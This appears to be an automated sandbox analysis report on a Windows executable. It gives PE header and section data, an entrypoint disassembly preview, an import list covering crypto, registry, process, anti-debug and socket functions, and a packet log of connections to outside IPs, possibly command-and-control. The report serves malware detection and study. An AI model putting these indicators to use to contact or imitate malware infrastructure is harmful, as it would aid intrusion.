Time Stamp:	0x6779A0A5 [Sat Jan 4 20:57:09 2025 UTC]
TLS Callbacks:	0x402d68a0, 0x1, 0x40325570, 0x1, 0x40325540, 0x1
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	9f0e006765a3cecf84bd333ea984886b

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
dec eax
mov eax, dword ptr [0053A625h]
mov dword ptr [eax], 00000001h
call 00007F2738D868DFh
nop
nop
dec eax
add esp, 28h
ret
nop dword ptr [eax]
dec eax
sub esp, 28h
dec eax
mov eax, dword ptr [0053A605h]
mov dword ptr [eax], 00000000h
call 00007F2738D868BFh
nop
nop
dec eax
add esp, 28h
ret
nop dword ptr [eax]
dec eax
sub esp, 28h
call 00007F27390A5C0Ch
dec eax
cmp eax, 01h
sbb eax, eax
dec eax
add esp, 28h
ret
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
dec eax
lea ecx, dword ptr [00000009h]
jmp 00007F2738D86B19h
nop dword ptr [eax+00h]
ret
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
mov eax, dword ptr [edx+34h]
test al, 10h
jne 00007F27390A004Bh
test al, 20h
jne 00007F27390A00F3h
jmp 00007F27390A172Dh
nop dword ptr [eax+eax+00000000h]
cmp dword ptr [ecx+10h], 3B9ACA01h
je 00007F2738D86DD9h
dec eax
mov eax, dword ptr [ecx]
dec eax
dec dword ptr [eax]
jne 00007F2738D86B47h
jmp 00007F2738D8E82Ah
ret
nop dword ptr [eax+00h]
cmp dword ptr [ecx], 03h
jne 00007F2738D86B4Bh
dec eax
add ecx, 00000000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5a9000	0x2adc	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x5ae000	0x368	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x541000	0x1c98c	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x5af000	0x6a88	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x53b600	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x5a99e0	0x8b0	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x435528	0x435600	5b36ca709a2bc1b1fced02102ccc5b9f	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x437000	0x57d0	0x5800	972b88b78f773caaa4b957ef8d21babe	False	0.2741477272727273	data	3.543170507625781	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x43d000	0x103a10	0x103c00	e49a235b517401e60b5ba17398dcb681	False	0.3684403949109721	data	5.615700084048056	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.pdata	0x541000	0x1c98c	0x1ca00	dbf6f5c4b82e58a290a33c8db525a40e	False	0.5354974072052402	data	6.367230285918038	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.xdata	0x55e000	0x49ffc	0x4a000	9494bae00d8b13f623a4060f1d426ebe	False	0.3409984691722973	data	5.504336579211642	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss	0x5a8000	0xd50	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x5a9000	0x2adc	0x2c00	ba21397b2d7710a851d49dd4be95f524	False	0.26331676136363635	data	4.424400923610701	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x5ac000	0x68	0x200	4bc1b08c802fb36768f914a2cf5bfe2a	False	0.076171875	data	0.4029411215812382	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x5ad000	0x10	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x5ae000	0x368	0x400	c66aec474b7e1d955a0b98e8dc014538	False	0.3779296875	data	2.82031114891783	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x5af000	0x6a88	0x6c00	7cc0f2c9cfd03b3a1f0be9d039a4669c	False	0.3882740162037037	data	5.452027365912451	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x5ae058	0x310	data	English	United States	0.44642857142857145

Imports

DLL	Import
advapi32.dll	CryptAcquireContextW, CryptDestroyKey, CryptImportKey, CryptReleaseContext, RegCloseKey, RegCreateKeyExW, RegEnumKeyExW, RegEnumValueW, RegOpenKeyExW, RegQueryInfoKeyW, RegQueryValueExW, RegSetValueExW
crypt32.dll	CertAddCertificateContextToStore, CertAddEncodedCTLToStore, CertAddEncodedCertificateToStore, CertCloseStore, CertCreateCertificateContext, CertDeleteCertificateFromStore, CertDuplicateCertificateChain, CertDuplicateCertificateContext, CertDuplicateStore, CertEnumCertificatesInStore, CertFreeCertificateChain, CertFreeCertificateContext, CertGetCertificateChain, CertGetCertificateContextProperty, CertGetEnhancedKeyUsage, CertOpenStore, CertSetCertificateContextProperty, CertVerifyCertificateChainPolicy, CertVerifyTimeValidity, CryptAcquireCertificatePrivateKey, CryptBinaryToStringA, CryptDecodeObjectEx, CryptEncodeObjectEx, CryptHashCertificate, CryptStringToBinaryA, PFXExportCertStore, PFXImportCertStore
kernel32.dll	AddVectoredExceptionHandler, CancelIo, CancelIoEx, CloseHandle, CompareStringOrdinal, ConnectNamedPipe, CopyFileExW, CreateDirectoryW, CreateEventW, CreateFileMappingA, CreateFileW, CreateHardLinkW, CreateIoCompletionPort, CreateNamedPipeW, CreatePipe, CreateProcessW, CreateSymbolicLinkW, CreateThread, CreateToolhelp32Snapshot, CreateWaitableTimerExW, DeleteFileW, DeleteProcThreadAttributeList, DeviceIoControl, DisconnectNamedPipe, DuplicateHandle, ExitProcess, FileTimeToSystemTime, FindClose, FindFirstFileW, FindNextFileW, FlushFileBuffers, FormatMessageW, FreeEnvironmentStringsW, GetCommandLineW, GetConsoleMode, GetCurrentDirectoryW, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetEnvironmentStringsW, GetEnvironmentVariableW, GetExitCodeProcess, GetFileAttributesW, GetFileInformationByHandle, GetFileInformationByHandleEx, GetFileType, GetFinalPathNameByHandleW, GetFullPathNameW, GetLastError, GetLogicalProcessorInformation, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleW, GetNamedPipeInfo, GetOverlappedResult, GetProcAddress, GetProcessHeap, GetProcessId, GetQueuedCompletionStatusEx, GetStdHandle, GetSystemDirectoryW, GetSystemInfo, GetSystemTimePreciseAsFileTime, GetTempPathW, GetWindowsDirectoryW, HeapAlloc, HeapFree, HeapReAlloc, InitOnceBeginInitialize, InitOnceComplete, InitializeProcThreadAttributeList, IsDebuggerPresent, LocalFree, MapViewOfFile, Module32FirstW, Module32NextW, MoveFileExW, MultiByteToWideChar, OpenProcess, PostQueuedCompletionStatus, QueryPerformanceCounter, QueryPerformanceFrequency, ReadConsoleW, ReadFile, ReadFileEx, RemoveDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, SetCurrentDirectoryW, SetEnvironmentVariableW, SetFileAttributesW, SetFileCompletionNotificationModes, SetFileInformationByHandle, SetFilePointerEx, SetFileTime, SetHandleInformation, SetLastError, SetThreadStackGuarantee, SetUnhandledExceptionFilter, SetWaitableTimer, Sleep, SleepEx, SwitchToThread, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnmapViewOfFile, UpdateProcThreadAttribute, WaitForMultipleObjects, WaitForSingleObject, WideCharToMultiByte, WriteConsoleW, WriteFile, WriteFileEx
ncrypt.dll	NCryptFreeObject
ntdll.dll	NtCancelIoFileEx, NtCreateFile, NtDeviceIoControlFile, NtOpenFile, NtReadFile, NtWriteFile, RtlNtStatusToDosError
psapi.dll	EnumProcessModules, EnumProcesses, GetModuleBaseNameW
secur32.dll	AcceptSecurityContext, AcquireCredentialsHandleA, ApplyControlToken, DecryptMessage, DeleteSecurityContext, EncryptMessage, FreeContextBuffer, FreeCredentialsHandle, InitializeSecurityContextW, QueryContextAttributesW
user32.dll	MessageBoxW
userenv.dll	GetUserProfileDirectoryW
ws2_32.dll	WSACleanup, WSADuplicateSocketW, WSAGetLastError, WSAIoctl, WSAPoll, WSARecv, WSARecvFrom, WSASend, WSASendMsg, WSASendTo, WSASocketW, WSAStartup, accept, bind, closesocket, connect, freeaddrinfo, getaddrinfo, getpeername, getsockname, getsockopt, ioctlsocket, listen, recv, recvfrom, select, send, sendto, setsockopt, shutdown, socket
api-ms-win-core-synch-l1-2-0.dll	WaitOnAddress, WakeByAddressAll, WakeByAddressSingle
bcryptprimitives.dll	ProcessPrng
KERNEL32.dll	DeleteCriticalSection, EnterCriticalSection, InitializeCriticalSection, IsDBCSLeadByteEx, LeaveCriticalSection, RaiseException, RtlUnwindEx, VirtualProtect, VirtualQuery, __C_specific_handler
msvcrt.dll	___lc_codepage_func, ___mb_cur_max_func, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _assert, _cexit, _commode, _errno, _fmode, _fpreset, _initterm, _lock, _onexit, _unlock, abort, calloc, clock, exit, fflush, fprintf, fputc, free, fwrite, localeconv, malloc, memcmp, memcpy, memmove, memset, qsort, signal, strerror, strlen, strncmp, vfprintf, wcslen

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2025 16:40:19.984394073 CET	49704	80	192.168.2.5	93.115.172.41
Jan 8, 2025 16:40:19.989274979 CET	80	49704	93.115.172.41	192.168.2.5
Jan 8, 2025 16:40:19.989346027 CET	49704	80	192.168.2.5	93.115.172.41
Jan 8, 2025 16:40:19.990174055 CET	49704	80	192.168.2.5	93.115.172.41
Jan 8, 2025 16:40:19.994976997 CET	80	49704	93.115.172.41	192.168.2.5
Jan 8, 2025 16:40:20.591267109 CET	80	49704	93.115.172.41	192.168.2.5
Jan 8, 2025 16:40:20.637801886 CET	49704	80	192.168.2.5	93.115.172.41
Jan 8, 2025 16:40:20.761595011 CET	49705	443	192.168.2.5	140.82.121.4
Jan 8, 2025 16:40:20.761650085 CET	443	49705	140.82.121.4	192.168.2.5
Jan 8, 2025 16:40:20.761735916 CET	49705	443	192.168.2.5	140.82.121.4
Jan 8, 2025 16:40:20.771075964 CET	49705	443	192.168.2.5	140.82.121.4
Jan 8, 2025 16:40:20.771092892 CET	443	49705	140.82.121.4	192.168.2.5
Jan 8, 2025 16:40:21.435781956 CET	443	49705	140.82.121.4	192.168.2.5
Jan 8, 2025 16:40:21.435930014 CET	49705	443	192.168.2.5	140.82.121.4
Jan 8, 2025 16:40:21.439985991 CET	49705	443	192.168.2.5	140.82.121.4
Jan 8, 2025 16:40:21.439994097 CET	443	49705	140.82.121.4	192.168.2.5
Jan 8, 2025 16:40:21.440301895 CET	443	49705	140.82.121.4	192.168.2.5
Jan 8, 2025 16:40:21.481498003 CET	49705	443	192.168.2.5	140.82.121.4
Jan 8, 2025 16:40:21.489717960 CET	49705	443	192.168.2.5	140.82.121.4
Jan 8, 2025 16:40:21.531338930 CET	443	49705	140.82.121.4	192.168.2.5
Jan 8, 2025 16:40:21.893708944 CET	443	49705	140.82.121.4	192.168.2.5
Jan 8, 2025 16:40:21.893914938 CET	443	49705	140.82.121.4	192.168.2.5
Jan 8, 2025 16:40:21.893946886 CET	443	49705	140.82.121.4	192.168.2.5
Jan 8, 2025 16:40:21.894000053 CET	49705	443	192.168.2.5	140.82.121.4
Jan 8, 2025 16:40:21.894047976 CET	49705	443	192.168.2.5	140.82.121.4
Jan 8, 2025 16:40:21.894505978 CET	49705	443	192.168.2.5	140.82.121.4
Jan 8, 2025 16:40:21.894526958 CET	443	49705	140.82.121.4	192.168.2.5
Jan 8, 2025 16:40:21.903232098 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:21.903290033 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:21.903410912 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:21.903738022 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:21.903757095 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.387348890 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.387459040 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.434817076 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.434840918 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.435178041 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.435880899 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.479334116 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.616606951 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.617222071 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.617249012 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.617280960 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.617280006 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.617307901 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.617328882 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.617583990 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.617613077 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.617635965 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.617645979 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.617652893 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.617671013 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.618447065 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.618473053 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.618501902 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.618509054 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.618563890 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.627727032 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.668993950 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.712224007 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.712301970 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.712335110 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.712349892 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.712363958 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.712395906 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.712515116 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.712682009 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.712724924 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.712737083 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.713169098 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.713197947 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.713212013 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.713217974 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.713257074 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.713263035 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.714067936 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.714097023 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.714113951 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.714122057 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.714149952 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.714154005 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.714162111 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.714206934 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.714751959 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.714837074 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.714927912 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.714936018 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.762358904 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.762439013 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.762465954 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.802920103 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.803004026 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.803020954 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.803806067 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.803811073 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.803824902 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.803832054 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.803850889 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.803863049 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.803874016 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.803893089 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.803896904 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.803915024 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.805582047 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.805600882 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.805635929 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.805638075 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.805649996 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.805660009 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.805679083 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.807226896 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.807240963 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.807287931 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.807296038 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.807305098 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.856549025 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.893552065 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.893567085 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.893603086 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.893697023 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.893709898 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.893723011 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.893748999 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.894301891 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.894319057 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.894371033 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.894378901 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.894395113 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.894424915 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.895262003 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.895282984 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.895339012 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.895345926 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.895369053 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.895399094 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.896234035 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.896250963 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.896301031 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.896308899 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.896394014 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.896394968 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.897149086 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.897164106 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.897229910 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.897245884 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.897257090 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.897294998 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.898164988 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.898181915 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.898232937 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.898238897 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.898266077 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.898277998 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.943223953 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.943250895 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.943377972 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.943393946 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.943434000 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.983978033 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.984014034 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.984091043 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.984127998 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.984143019 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.984175920 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.984611988 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.984632969 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.984719992 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.984726906 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.984767914 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.984960079 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.984992027 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.985044956 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.985049963 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.985070944 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.985090017 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.985474110 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.985490084 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.985538960 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.985544920 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.985563040 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.985584021 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.988588095 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.988616943 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.988687038 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.988692999 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.988701105 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.988728046 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.989185095 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.989202976 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.989406109 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.989413023 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.989461899 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.989703894 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.989727974 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.989784002 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:22.989790916 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:22.989831924 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:23.074345112 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:23.074389935 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:23.074448109 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:23.074486017 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:23.074525118 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:23.074539900 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:23.074579000 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:23.074745893 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:23.074764013 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:23.074807882 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:23.074816942 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:23.074829102 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:23.075207949 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:23.075229883 CET	443	49706	185.199.110.133	192.168.2.5
Jan 8, 2025 16:40:23.075267076 CET	49706	443	192.168.2.5	185.199.110.133
Jan 8, 2025 16:40:23.075273037 CET	443	49706	185.199.110.133	192.168.2.5
